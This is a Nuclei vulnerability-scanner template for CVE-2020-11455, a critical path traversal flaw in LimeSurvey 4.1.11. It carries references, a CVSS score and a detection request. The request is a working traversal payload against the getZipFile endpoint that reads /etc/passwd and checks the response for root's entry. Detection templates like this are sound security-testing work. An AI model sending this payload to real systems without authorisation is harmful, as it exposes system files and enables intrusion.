nuclei-templates/cves/2020/CVE-2020-11455.yaml

38 lines
1.2 KiB
YAML

id: CVE-2020-11455
info:
name: LimeSurvey 4.1.11 - Local File Inclusion
author: daffainfo
severity: critical
description: LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference:
- https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455
- https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b
- http://packetstormsecurity.com/files/157112/LimeSurvey-4.1.11-Path-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-11455
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11455
cwe-id: CWE-22
tags: cve2020,lfi,edb,packetstorm,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22